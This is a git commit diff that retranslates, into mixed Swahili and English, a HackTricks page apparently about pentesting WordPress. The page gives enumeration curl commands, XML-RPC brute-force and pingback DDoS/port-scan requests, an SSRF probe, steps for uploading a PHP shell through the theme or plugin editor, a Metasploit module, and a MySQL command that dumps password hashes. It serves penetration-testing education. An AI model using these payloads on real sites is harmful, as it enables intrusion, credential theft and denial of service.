mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
Translated ['', 'src/network-services-pentesting/pentesting-web/wordpres
This commit is contained in:
Translator
parent
71125a141d
commit
39c4809e67
@ -4,49 +4,49 @@
|
||||
|
||||
## Taarifa za Msingi
|
||||
|
||||
- **Faili zilizopakiwa** zinaenda kwa: `http://10.10.10.10/wp-content/uploads/2018/08/a.txt`
|
||||
- **Files za themes zinaweza kupatikana katika /wp-content/themes/,** hivyo ukibadilisha baadhi ya php ya theme ili kupata RCE huenda utatumia njia hiyo. Kwa mfano: Ukiotumia **theme twentytwelve** unaweza **kupata** faili ya **404.php** katika: [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
|
||||
- **Uploaded** files go to: `http://10.10.10.10/wp-content/uploads/2018/08/a.txt`
|
||||
- **Themes files can be found in /wp-content/themes/,** hivyo ukibadilisha baadhi ya php ya theme ili kupata RCE huenda utatumia path hiyo. Kwa mfano: Using **theme twentytwelve** unaweza **access** faili **404.php** katika: [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
|
||||
|
||||
- **URL nyingine ambayo inaweza kusaidia ni:** [**/wp-content/themes/default/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
|
||||
- **Another useful url could be:** [**/wp-content/themes/default/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
|
||||
|
||||
- Katika **wp-config.php** unaweza kupata nenosiri wa root wa database.
|
||||
- Njia za kuingia za default za kuangalia: _**/wp-login.php, /wp-login/, /wp-admin/, /wp-admin.php, /login/**_
|
||||
- Katika **wp-config.php** unaweza kupata root password ya database.
|
||||
- Default login paths to check: _**/wp-login.php, /wp-login/, /wp-admin/, /wp-admin.php, /login/**_
|
||||
|
||||
### **Mafaili Makuu ya WordPress**
|
||||
### **Main WordPress Files**
|
||||
|
||||
- `index.php`
|
||||
- `license.txt` ina taarifa muhimu kama toleo la WordPress lililowekwa.
|
||||
- `wp-activate.php` inatumika kwa mchakato wa kuthibitisha kwa email wakati wa kuanzisha tovuti mpya ya WordPress.
|
||||
- Folda za login (zinaweza kubadilishwa jina ili kuzijificha):
|
||||
- `license.txt` ina taarifa muhimu kama toleo la WordPress lililosanidiwa.
|
||||
- `wp-activate.php` inatumiwa kwa mchakato wa activation kwa email wakati wa kuanzisha tovuti mpya ya WordPress.
|
||||
- Login folders (may be renamed to hide it):
|
||||
- `/wp-admin/login.php`
|
||||
- `/wp-admin/wp-login.php`
|
||||
- `/login.php`
|
||||
- `/wp-login.php`
|
||||
- `xmlrpc.php` ni faili inayowakilisha kipengele cha WordPress kinachoruhusu data kutumwa kwa kutumia HTTP kama njia ya usafirishaji na XML kama mbinu ya uandishi. Aina hii ya mawasiliano imebadilishwa na WordPress [REST API](https://developer.wordpress.org/rest-api/reference).
|
||||
- Folda `wp-content` ni saraka kuu ambapo plugins na themes zinahifadhiwa.
|
||||
- `wp-content/uploads/` ni saraka ambapo faili zote zilizopakiwa kwenye jukwaa zinahifadhiwa.
|
||||
- `wp-includes/` ni saraka ambapo mafaili ya msingi yanahifadhiwa, kama vyeti, fonti, faili za JavaScript, na widgets.
|
||||
- `wp-sitemap.xml` Katika toleo la WordPress 5.5 na zaidi, WordPress huunda faili ya sitemap XML yenye machapisho yote ya umma na aina za posti zinazoweza kuulizwa kwa umma na taxonomies.
|
||||
- `xmlrpc.php` ni faili inayowakilisha feature ya WordPress inayoruhusu data kusafirishwa kwa kutumia HTTP kama transport mechanism na XML kama encoding mechanism. Aina hii ya mawasiliano imebadilishwa na WordPress [REST API](https://developer.wordpress.org/rest-api/reference).
|
||||
- Folder ya `wp-content` ni saraka kuu ambapo plugins na themes zinahifadhiwa.
|
||||
- `wp-content/uploads/` ni saraka ambapo faili zote zilizopakiwa kwenye platform zinahifadhiwa.
|
||||
- `wp-includes/` ni saraka ambapo core files zinahifadhiwa, kama certificates, fonts, JavaScript files, na widgets.
|
||||
- `wp-sitemap.xml` Katika WordPress versions 5.5 na baadaye, WordPress huunda faili ya sitemap XML yenye machapisho yote ya umma na post types na taxonomies zinazoweza kuulizwa hadharani.
|
||||
|
||||
**Post exploitation**
|
||||
|
||||
- Faili `wp-config.php` ina taarifa zinazohitajika na WordPress kuunganishwa na database kama jina la database, host ya database, username na nenosiri, authentication keys na salts, na prefix ya jedwali la database. Faili hii ya usanidi pia inaweza kutumika kuwasha mode ya DEBUG, ambayo inaweza kusaidia katika utatuzi wa matatizo.
|
||||
- Faili ya `wp-config.php` ina taarifa zinazohitajika na WordPress kuunganishwa na database kama jina la database, database host, username na password, authentication keys and salts, na database table prefix. Faili hii ya configuration pia inaweza kutumiwa kuwasha DEBUG mode, ambayo inaweza kusaidia katika troubleshooting.
|
||||
|
||||
### Ruhusa za Watumiaji
|
||||
### Users Permissions
|
||||
|
||||
- **Administrator**
|
||||
- **Editor**: Huchapisha na kusimamia machapisho yake na ya wengine
|
||||
- **Author**: Huchapisha na kusimamia machapisho yake mwenyewe
|
||||
- **Contributor**: Anaandika na kusimamia machapisho yake lakini hawezi kuyachapisha
|
||||
- **Subscriber**: Kusoma machapisho na kuhariri profaili yao
|
||||
- **Subscriber**: Vichapisho vya kivinjari na kuhariri profile yao
|
||||
|
||||
## **Uorodheshaji Pasif**
|
||||
## **Passive Enumeration**
|
||||
|
||||
### **Pata toleo la WordPress**
|
||||
### **Get WordPress version**
|
||||
|
||||
Angalia kama unaweza kupata mafaili `/license.txt` au `/readme.html`
|
||||
Angalia kama unaweza kupata faili `/license.txt` au `/readme.html`
|
||||
|
||||
Ndani ya **msimbo wa chanzo** wa ukurasa (mfano kutoka [https://wordpress.org/support/article/pages/](https://wordpress.org/support/article/pages/)):
|
||||
Ndani ya **source code** ya ukurasa (mfano kutoka [https://wordpress.org/support/article/pages/](https://wordpress.org/support/article/pages/)):
|
||||
|
||||
- grep
|
||||
```bash
|
||||
@ -56,11 +56,11 @@ curl https://victim.com/ | grep 'content="WordPress'
|
||||
|
||||
.png>)
|
||||
|
||||
- Faili za linki za CSS
|
||||
- CSS link files
|
||||
|
||||
.png>)
|
||||
|
||||
- Faili za JavaScript
|
||||
- JavaScript files
|
||||
|
||||
.png>)
|
||||
|
||||
@ -72,44 +72,44 @@ curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/supp
|
||||
```bash
|
||||
curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-content/themes' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
|
||||
```
|
||||
### Pata matoleo kwa ujumla
|
||||
### Kutoa matoleo kwa ujumla
|
||||
```bash
|
||||
curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/support/article/pages/ | grep http | grep -E '?ver=' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
|
||||
|
||||
```
|
||||
## Active enumeration
|
||||
## Uorodheshaji wa Kivitendo
|
||||
|
||||
### Plugins and Themes
|
||||
|
||||
Huenda usiweze kupata Plugins and Themes zote zinazowezekana. Ili kugundua zote, utahitaji **actively Brute Force a list of Plugins and Themes** (kwa bahati nzuri kwetu kuna automated tools ambazo zina orodha hizi).
|
||||
Huenda hautaweza kugundua Plugins and Themes zote zinazowezekana. Ili kuwagundua zote, utahitaji **kivitendo Brute Force orodha ya Plugins and Themes** (kwa bahati nzuri kwetu kuna zana za kiotomatiki ambazo zinajumuisha orodha hizi).
|
||||
|
||||
### Users
|
||||
### Watumiaji
|
||||
|
||||
- **ID Brute:** Unapata users halali kutoka kwenye tovuti ya WordPress kwa Brute Forcing users IDs:
|
||||
- **ID Brute:** Unapata watumiaji halali kutoka kwenye tovuti ya WordPress kwa Brute Forcing IDs za watumiaji:
|
||||
```bash
|
||||
curl -s -I -X GET http://blog.example.com/?author=1
|
||||
```
|
||||
Kama majibu ni **200** au **30X**, hiyo ina maana id ni **valid**. Ikiwa jibu ni **400**, basi id ni **invalid**.
|
||||
Iwapo majibu ni **200** au **30X**, hiyo ina maana id ni **halali**. Ikiwa jibu ni **400**, basi id ni **batili**.
|
||||
|
||||
- **wp-json:** Unaweza pia kujaribu kupata taarifa kuhusu watumiaji kwa kuuliza:
|
||||
```bash
|
||||
curl http://blog.example.com/wp-json/wp/v2/users
|
||||
```
|
||||
Endpoint nyingine ya `/wp-json/` ambayo inaweza kufichua baadhi ya taarifa kuhusu watumiaji ni:
|
||||
Endpoint mwingine wa `/wp-json/` ambao unaweza kufichua baadhi ya taarifa kuhusu watumiaji ni:
|
||||
```bash
|
||||
curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL
|
||||
```
|
||||
Note that this endpoint only exposes users that have made a post. **Taarifa kuhusu watumiaji pekee ambao wamewezesha kipengele hiki zitatolewa**.
|
||||
Note that this endpoint only exposes users that have made a post. **Only information about the users that has this feature enable will be provided**.
|
||||
|
||||
Pia kumbuka kwamba **/wp-json/wp/v2/pages** inaweza leak anwani za IP.
|
||||
Also note that **/wp-json/wp/v2/pages** could leak IP addresses.
|
||||
|
||||
- **Login username enumeration**: Wakati wa kuingia kwenye **`/wp-login.php`**, **ujumbe** hutofautiana kuonyesha ikiwa **username** ipo au la.
|
||||
- **Login username enumeration**: Wakati wa kuingia kwenye **`/wp-login.php`** **message** huwa **tofauti**, ikionyesha ikiwa **username** ipo au la.
|
||||
|
||||
### XML-RPC
|
||||
|
||||
Ikiwa `xml-rpc.php` iko active unaweza kufanya credentials brute-force au kuitumia kuanzisha DoS attacks dhidi ya rasilimali nyingine. (Kwa mfano, unaweza kuautomate mchakato huu kwa kutumia [hii](https://github.com/relarizky/wpxploit)).
|
||||
Ikiwa `xml-rpc.php` inafanya kazi unaweza kufanya credentials brute-force au kuitumia kuanzisha mashambulizi ya DoS kwa rasilimali nyingine. (You can automate this process[ using this](https://github.com/relarizky/wpxploit) for example).
|
||||
|
||||
Ili kuona ikiwa iko active jaribu kufikia _**/xmlrpc.php**_ na tuma ombi hili:
|
||||
To see if it is active try to access to _**/xmlrpc.php**_ and send this request:
|
||||
|
||||
**Angalia**
|
||||
```html
|
||||
@ -122,7 +122,7 @@ Ili kuona ikiwa iko active jaribu kufikia _**/xmlrpc.php**_ na tuma ombi hili:
|
||||
|
||||
**Credentials Bruteforce**
|
||||
|
||||
**`wp.getUserBlogs`**, **`wp.getCategories`** au **`metaWeblog.getUsersBlogs`** ni baadhi ya mbinu zinazoweza kutumika kufanya brute-force ya credentials. Ikiwa unaweza kupata yoyote yao, unaweza kutuma kitu kama:
|
||||
**`wp.getUserBlogs`**, **`wp.getCategories`** au **`metaWeblog.getUsersBlogs`** ni baadhi ya mbinu ambazo zinaweza kutumika ku-brute-force credentials. Ikiwa unaweza kupata yoyote ya hizi unaweza kutuma kitu kama:
|
||||
```html
|
||||
<methodCall>
|
||||
<methodName>wp.getUsersBlogs</methodName>
|
||||
@ -132,13 +132,13 @@ Ili kuona ikiwa iko active jaribu kufikia _**/xmlrpc.php**_ na tuma ombi hili:
|
||||
</params>
|
||||
</methodCall>
|
||||
```
|
||||
Ujumbe _"Incorrect username or password"_ ndani ya 200 code response unapaswa kuonekana ikiwa credentials si sahihi.
|
||||
Ujumbe _"Jina la mtumiaji au nywila si sahihi"_ ndani ya 200 code response unapaswa kuonekana ikiwa credentials sio sahihi.
|
||||
|
||||
 (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (4) (1).png>)
|
||||
|
||||
.png>)
|
||||
|
||||
Ukikitumia credentials sahihi unaweza kupakia faili. Katika response, path itaonekana ([https://gist.github.com/georgestephanis/5681982](https://gist.github.com/georgestephanis/5681982))
|
||||
Kwa kutumia credentials sahihi unaweza kupakia faili. Katika response, path itaonekana ([https://gist.github.com/georgestephanis/5681982](https://gist.github.com/georgestephanis/5681982))
|
||||
```html
|
||||
<?xml version='1.0' encoding='utf-8'?>
|
||||
<methodCall>
|
||||
@ -172,14 +172,14 @@ Pia kuna njia ya **haraka zaidi** ya brute-force credentials kwa kutumia **`syst
|
||||
|
||||
<figure><img src="../../images/image (628).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**Kuepuka 2FA**
|
||||
**Bypass 2FA**
|
||||
|
||||
Njia hii imeundwa kwa programu na si kwa watu, na ni ya zamani, kwa hivyo haiungi mkono 2FA. Hivyo, ikiwa una creds halali lakini mlango mkuu umewekwa 2FA, **huenda ukaweza kutumia xmlrpc.php kuingia kwa kutumia creds hizo ukiyeuka 2FA**. Kumbuka kuwa hutaweza kutekeleza vitendo vyote unavyoweza kupitia console, lakini bado huenda ukaweza kufikia RCE kama Ippsec anavyoelezea katika [https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s](https://www.youtube.com/watch?v=p8mIdm93mfw&t=1130s)
|
||||
Njia hii imelengwa kwa programu na si watu, ni ya zamani, kwa hiyo haitegemei 2FA. Kwa hivyo, ikiwa una creds halali lakini mlango mkuu umehifadhiwa na 2FA, **huenda ukaweza kutumia xmlrpc.php kuingia ukitumia creds hizo na kuepuka 2FA**. Kumbuka hutakuwa na uwezo wa kufanya vitendo vyote unavyoweza kupitia console, lakini bado huenda ukaweza kufikia RCE kama Ippsec anavyoelezea katika [https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s](https://www.youtube.com/watch?v=p8mIdm93mfw&t=1130s)
|
||||
|
||||
**DDoS au port scanning**
|
||||
**DDoS or port scanning**
|
||||
|
||||
Iwapo unaweza kupata method _**pingback.ping**_ ndani ya orodha unaweza kufanya Wordpress itume ombi lolote kwa host/port yoyote.\
|
||||
Hii inaweza kutumika kuomba **maelfu** ya **tovuti** za **Wordpress** ziweze **kupata** eneo moja (hivyo kusababisha **DDoS** katika eneo hilo) au unaweza kuitumia kufanya **Wordpress** i**scan** baadhi ya **mtandao** wa ndani (unaweza kuainisha port yoyote).
|
||||
Ikiwa unaweza kupata method _**pingback.ping**_ ndani ya orodha, unaweza kuifanya Wordpress itume ombi lolote kwa host/port yoyote.\
|
||||
Hii inaweza kutumika kuomba **maelfu** ya **Wordpress** **sites** kufikia **eneo** moja (kwa hivyo **DDoS** itasababisha eneo hilo) au unaweza kuitumia kufanya **Wordpress** i**scan** mtandao wa ndani (unaweza kuainisha port yoyote).
|
||||
```html
|
||||
<methodCall>
|
||||
<methodName>pingback.ping</methodName>
|
||||
@ -191,9 +191,9 @@ Hii inaweza kutumika kuomba **maelfu** ya **tovuti** za **Wordpress** ziweze **k
|
||||
```
|
||||
|
||||
|
||||
Ikiwa unapata **faultCode** yenye thamani **kubwa** kuliko **0** (17), ina maana bandari iko wazi.
|
||||
Ikiwa unapata **faultCode** yenye thamani **kubwa zaidi** kuliko **0** (17), ina maana port iko wazi.
|
||||
|
||||
Tazama matumizi ya **`system.multicall`** katika sehemu iliyopita ili kujifunza jinsi ya kuitumia vibaya ili kusababisha DDoS.
|
||||
Angalia matumizi ya **`system.multicall`** katika sehemu iliyopita ili kujifunza jinsi ya kuitumia vibaya ili kusababisha DDoS.
|
||||
|
||||
**DDoS**
|
||||
```html
|
||||
@ -209,15 +209,15 @@ Tazama matumizi ya **`system.multicall`** katika sehemu iliyopita ili kujifunza
|
||||
|
||||
### wp-cron.php DoS
|
||||
|
||||
Faili hii kwa kawaida hupatikana chini ya root ya tovuti ya Wordpress: **`/wp-cron.php`**\
|
||||
Wakati faili hii inapofikiwa a "**nzito**" MySQL **query** inafanywa, hivyo inaweza kutumiwa na **washambuliaji** **kusababisha** **DoS**.\
|
||||
Aidha, kwa default, the `wp-cron.php` huitwa kila mara kwenye page load (wakati wowote client anapoomba ukurasa wowote wa Wordpress), jambo ambalo kwenye tovuti zenye trafiki kubwa linaweza kusababisha matatizo (DoS).
|
||||
Faili hii kawaida huwa ndani ya root ya tovuti ya Wordpress: **`/wp-cron.php`**\
|
||||
Wakati faili hii inapotumiwa, huanzishwa "**heavy**" MySQL **query**, hivyo inaweza kutumika na **attackers** kusababisha **DoS**.\
|
||||
Pia, kwa default, `wp-cron.php` inaitwa kila wakati ukurasa unapopakiwa (mara zote mteja anapoomba ukurasa wowote wa Wordpress), jambo ambalo kwenye tovuti zenye trafiki kubwa linaweza kusababisha matatizo (DoS).
|
||||
|
||||
Inashauriwa kuzima Wp-Cron na kuunda cronjob halisi ndani ya host itakayotekeleza vitendo vinavyohitajika kwa vipindi vya kawaida (bila kusababisha issues).
|
||||
Inashauriwa kuzima Wp-Cron na kuunda cronjob halisi ndani ya host ambayo itaendesha vitendo vinavyohitajika kwa vipindi vya kawaida (bila kusababisha matatizo).
|
||||
|
||||
### /wp-json/oembed/1.0/proxy - SSRF
|
||||
|
||||
Jaribu kufikia _https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net_ na tovuti ya Worpress inaweza kutuma request kwako.
|
||||
Jaribu kufikia _https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net_ na tovuti ya Worpress inaweza kutuma ombi kwako.
|
||||
|
||||
This is the response when it doesn't work:
|
||||
|
||||
@ -230,9 +230,9 @@ This is the response when it doesn't work:
|
||||
https://github.com/t0gu/quickpress/blob/master/core/requests.go
|
||||
{{#endref}}
|
||||
|
||||
Chombo hiki huangalia kama **methodName: pingback.ping** ipo na kwa path **/wp-json/oembed/1.0/proxy** na ikiwa ipo, inajaribu kui-exploit.
|
||||
Chombo hiki kinakagua kama **methodName: pingback.ping** na njia **/wp-json/oembed/1.0/proxy** zipo; ikiwa zipo, hujaribu ku-exploit.
|
||||
|
||||
## Automatic Tools
|
||||
## Zana za Otomatiki
|
||||
```bash
|
||||
cmsmap -s http://www.domain.com -t 2 -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0"
|
||||
wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://www.domain.com [--plugins-detection aggressive] --api-token <API_TOKEN> --passwords /usr/share/wordlists/external/SecLists/Passwords/probable-v2-top1575.txt #Brute force found users and search for vulnerabilities using a free API token (up 50 searchs)
|
||||
@ -240,22 +240,22 @@ wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://www.domain.com [--plugins-detec
|
||||
```
|
||||
## Pata ufikiaji kwa kubadilisha bit
|
||||
|
||||
Zaidi ya shambulio la kweli, hii ni jambo la kushangaza. Katika CTF [https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man](https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man) unaweza kugeuza bit 1 kutoka kwa faili yoyote ya wordpress. Kwa hivyo unaweza kugeuza nafasi `5389` ya faili `/var/www/html/wp-includes/user.php` ili kufanya NOP kwa operesheni ya NOT (`!`).
|
||||
Zaidi ya kuwa shambulio halisi, hili ni jambo la ajabu. Katika CTF [https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man](https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man) ulingeweza kubadilisha bit 1 kwenye faili yoyote ya wordpress. Hivyo ulingeweza kubadilisha nafasi `5389` ya faili `/var/www/html/wp-includes/user.php` ili ku-NOP operesheni ya NOT (`!`).
|
||||
```php
|
||||
if ( ! wp_check_password( $password, $user->user_pass, $user->ID ) ) {
|
||||
return new WP_Error(
|
||||
```
|
||||
## **Paneli RCE**
|
||||
|
||||
**Kurekebisha php kutoka kwenye theme inayotumika (admin credentials needed)**
|
||||
Kubadilisha php ya theme inayotumika (admin credentials needed)
|
||||
|
||||
Appearance → Theme Editor → 404 Template (kwa upande wa kulia)
|
||||
|
||||
Badilisha yaliyomo kwa php shell:
|
||||
Badilisha maudhui kwa php shell:
|
||||
|
||||
.png>)
|
||||
|
||||
Tafuta mtandaoni jinsi ya kufikia ukurasa uliosasishwa huo. Katika kesi hii lazima ufikie hapa: [http://10.11.1.234/wp-content/themes/twentytwelve/404.php](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
|
||||
Tafuta mtandaoni jinsi ya kufikia ukurasa uliosasishwa. Katika kesi hii unapaswa kufikia hapa: [http://10.11.1.234/wp-content/themes/twentytwelve/404.php](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
|
||||
|
||||
### MSF
|
||||
|
||||
@ -263,13 +263,13 @@ Unaweza kutumia:
|
||||
```bash
|
||||
use exploit/unix/webapp/wp_admin_shell_upload
|
||||
```
|
||||
to get a session.
|
||||
kupata session.
|
||||
|
||||
## Plugin RCE
|
||||
|
||||
### PHP plugin
|
||||
|
||||
Inawezekana kupakia faili za .php kama plugin.\
|
||||
Inawezekana kupakia faili .php kama plugin.\
|
||||
Tengeneza php backdoor yako kwa mfano:
|
||||
|
||||
.png>)
|
||||
@ -286,44 +286,44 @@ Bonyeza Procced:
|
||||
|
||||
.png>)
|
||||
|
||||
Huenda hii haifanyi chochote dhahiri, lakini ukielekea Media, utaona shell yako imepakiwa:
|
||||
Inawezekana hili halitaonekana kufanya chochote, lakini ukienda Media, utaona shell yako imepakizwa:
|
||||
|
||||
.png>)
|
||||
|
||||
Fungua na utaona URL ya kutekeleza reverse shell:
|
||||
Fikia na utaona URL ya kutekeleza reverse shell:
|
||||
|
||||
.png>)
|
||||
|
||||
### Kupakia na kuamsha plugin hatarishi
|
||||
### Uploading and activating malicious plugin
|
||||
|
||||
Njia hii inahusisha usakinishaji wa plugin hatarishi inayojulikana kuwa na udhaifu na inaweza kutumika kupata web shell. Mchakato huu unafanywa kupitia WordPress dashboard kama ifuatavyo:
|
||||
Njia hii inahusisha usakinishaji wa plugin hatari inayoonekana kuwa na uharibifu na inaweza kutumika kupata web shell. Mchakato huu unafanyika kupitia WordPress dashboard kama ifuatavyo:
|
||||
|
||||
1. **Plugin Acquisition**: Plugin hupatikana kutoka chanzo kama Exploit DB kama [**here**](https://www.exploit-db.com/exploits/36374).
|
||||
2. **Plugin Installation**:
|
||||
- Elekea kwenye WordPress dashboard, kisha nenda `Dashboard > Plugins > Upload Plugin`.
|
||||
- Navigate to the WordPress dashboard, then go to `Dashboard > Plugins > Upload Plugin`.
|
||||
- Pakia faili la zip la plugin uliopakua.
|
||||
3. **Plugin Activation**: Baada plugin itakapowekwa kwa mafanikio, lazima iamshwe kupitia dashboard.
|
||||
3. **Plugin Activation**: Mara plugin imefanikiwa kusakinishwa, inapaswa kuamshwa kupitia dashboard.
|
||||
4. **Exploitation**:
|
||||
- Iwapo plugin "reflex-gallery" imewekwa na kuamshwa, inaweza kutumika kwa sababu inajulikana kuwa na udhaifu.
|
||||
- Metasploit framework inatoa exploit kwa udhaifu huu. Kwa kuingiza module inayofaa na kutekeleza amri maalum, session ya meterpreter inaweza kuanzishwa, ikitoa ufikaji usioidhinishwa kwa tovuti.
|
||||
- Inabainishwa kwamba hii ni mojawapo tu ya njia nyingi za kushambulia tovuti ya WordPress.
|
||||
- Ukiwa na plugin "reflex-gallery" imewekwa na kuamshwa, inaweza kutumika kwa sababu inajulikana kuwa vulnerable.
|
||||
- Metasploit framework inatoa exploit kwa kudumu hili. Kwa kuingiza module inayofaa na kutekeleza amri maalum, session ya meterpreter inaweza kuanzishwa, ikitoa ufikiaji usioidhinishwa kwenye tovuti.
|
||||
- Inatambuliwa kuwa hii ni mojawapo tu ya njia nyingi za kuchuja tovuti ya WordPress.
|
||||
|
||||
Yaliyomo yanajumuisha msaada wa picha unaoonyesha hatua kwenye WordPress dashboard za kusakinisha na kuamsha plugin. Hata hivyo, ni muhimu kutambua kwamba kutumia udhaifu kwa njia hii ni kinyume cha sheria na haikubaliki bila idhini sahihi. Taarifa hii inapaswa kutumika kwa uwajibikaji na tu katika muktadha wa kisheria, kama penetration testing kwa idhini wazi.
|
||||
Yaliyomo yanajumuisha msaada wa picha unaoonyesha hatua kwenye WordPress dashboard za kusakinisha na kuamsha plugin. Hata hivyo, ni muhimu kutambua kuwa kutumia udhaifu kwa njia hii ni kinyume cha sheria na si ya maadili bila ruhusa sahihi. Taarifa hii inapaswa kutumika kwa uwajibikaji na tu katika muktadha wa kisheria, kama pentesting yenye idhini wazi.
|
||||
|
||||
**For more detailed steps check:** [**https://www.hackingarticles.in/wordpress-reverse-shell/**](https://www.hackingarticles.in/wordpress-reverse-shell/)
|
||||
|
||||
## From XSS to RCE
|
||||
|
||||
- [**WPXStrike**](https://github.com/nowak0x01/WPXStrike): _**WPXStrike**_ ni script iliyoundwa kuinua udhaifu wa **Cross-Site Scripting (XSS)** hadi **Remote Code Execution (RCE)** au udhaifu mwingine muhimu katika WordPress. For more info check [**this post**](https://nowak0x01.github.io/papers/76bc0832a8f682a7e0ed921627f85d1d.html). Inatoa **support for Wordpress Versions 6.X.X, 5.X.X and 4.X.X. and allows to:**
|
||||
- _**Privilege Escalation:**_ Inaunda user kwenye WordPress.
|
||||
- _**(RCE) Custom Plugin (backdoor) Upload:**_ Pakia custom plugin (backdoor) yako kwenye WordPress.
|
||||
- _**(RCE) Built-In Plugin Edit:**_ Hariri Built-In Plugins ndani ya WordPress.
|
||||
- _**(RCE) Built-In Theme Edit:**_ Hariri Built-In Themes ndani ya WordPress.
|
||||
- [**WPXStrike**](https://github.com/nowak0x01/WPXStrike): _**WPXStrike**_ ni script iliyoundwa kuinua uvunjaji wa **Cross-Site Scripting (XSS)** hadi **Remote Code Execution (RCE)** au uwapo wa udhaifu mwingine mkali katika WordPress. Kwa maelezo zaidi angalia [**this post**](https://nowak0x01.github.io/papers/76bc0832a8f682a7e0ed921627f85d1d.html). Inatoa **support for Wordpress Versions 6.X.X, 5.X.X and 4.X.X. and allows to:**
|
||||
- _**Privilege Escalation:**_ Inaunda user katika WordPress.
|
||||
- _**(RCE) Custom Plugin (backdoor) Upload:**_ Pakia custom plugin yako (backdoor) kwenye WordPress.
|
||||
- _**(RCE) Built-In Plugin Edit:**_ Hariri Built-In Plugins katika WordPress.
|
||||
- _**(RCE) Built-In Theme Edit:**_ Hariri Built-In Themes katika WordPress.
|
||||
- _**(Custom) Custom Exploits:**_ Custom Exploits kwa Third-Party WordPress Plugins/Themes.
|
||||
|
||||
## Post Exploitation
|
||||
|
||||
Toa majina ya watumiaji na nywila:
|
||||
Chukua usernames na passwords:
|
||||
```bash
|
||||
mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;select concat_ws(':', user_login, user_pass) from wp_users;"
|
||||
```
|
||||
@ -333,23 +333,23 @@ mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;UPDATE
|
||||
```
|
||||
## Wordpress Plugins Pentest
|
||||
|
||||
### Uso wa Mashambulio
|
||||
### Uso wa Mashambulizi
|
||||
|
||||
Kujua jinsi plugin ya Wordpress inaweza kuonyesha utendaji ni muhimu ili kugundua udhaifu katika utendaji wake. Unaweza kuona jinsi plugin inaweza kuonyesha utendaji katika pointi zifuatazo na baadhi ya mifano ya plugins zilizo dhaifu katika [**this blog post**](https://nowotarski.info/wordpress-nonce-authorization/).
|
||||
Kujua jinsi plugin ya Wordpress inaweza kufichua utendaji ni muhimu ili kupata udhaifu katika utendaji wake. Unaweza kuona jinsi plugin inaweza kufichua utendaji katika pointi zifuatazo na baadhi ya mifano ya plugins zilizo na udhaifu katika [**this blog post**](https://nowotarski.info/wordpress-nonce-authorization/).
|
||||
|
||||
- **`wp_ajax`**
|
||||
|
||||
Moja ya njia plugin inaweza kufichua functions kwa watumiaji ni kupitia AJAX handlers. Hizi zinaweza kuwa na mende za logic, authorization, au authentication. Zaidi ya hayo, mara nyingi functions hizi zitatumia authentication na authorization kulingana na kuwepo kwa wordpress nonce ambayo **mtumiaji yeyote aliye authenticated katika instance ya Wordpress anaweza kuwa nayo** (bila kujali role yake).
|
||||
Moja ya njia ambazo plugin inaweza kufichua kazi kwa watumiaji ni kupitia AJAX handlers. Hizi zinaweza kuwa na mende za mantiki, idhinishaji, au uthibitishaji. Zaidi ya hayo, ni jambo la kawaida kwamba kazi hizi zitategemea uthibitishaji na idhinishaji kwa kuwepo kwa wordpress nonce ambayo **mtumiaji yoyote aliyethibitishwa kwenye mfumo wa Wordpress anaweza kuwa nayo** (bila kujali jukumu lake).
|
||||
|
||||
Hizi ndizo functions zinazoweza kutumika kufichua function katika plugin:
|
||||
These are the functions that can be used to expose a function in a plugin:
|
||||
```php
|
||||
add_action( 'wp_ajax_action_name', array(&$this, 'function_name'));
|
||||
add_action( 'wp_ajax_nopriv_action_name', array(&$this, 'function_name'));
|
||||
```
|
||||
**Matumizi ya `nopriv` hufanya endpoint ipatikane kwa watumiaji wote (hata wale wasio na uthibitisho).**
|
||||
**Matumizi ya `nopriv` hufanya endpoint ipatikane kwa watumiaji wote (hata wale wasiojidhinishwa).**
|
||||
|
||||
> [!CAUTION]
|
||||
> Zaidi ya hayo, ikiwa function inabaki tu kuangalia idhini ya mtumiaji kwa kutumia function `wp_verify_nonce`, function hii inachunguza tu kuwa mtumiaji ameingia, kwa kawaida haisemi kuangalia cheo la mtumiaji. Hivyo, watumiaji wenye ruhusa ndogo wanaweza kuwa na ufikiaji wa vitendo vyenye ruhusa za juu.
|
||||
> Zaidi ya hayo, ikiwa function inabaini tu idhini ya mtumiaji kwa kutumia `wp_verify_nonce`, function hiyo inathibitisha tu kwamba mtumiaji ameingia, kawaida haisemi jukumu la mtumiaji. Hivyo watumiaji wenye ruhusa ndogo wanaweza kufikia vitendo vya watumiaji wenye ruhusa kubwa.
|
||||
|
||||
- **REST API**
|
||||
|
||||
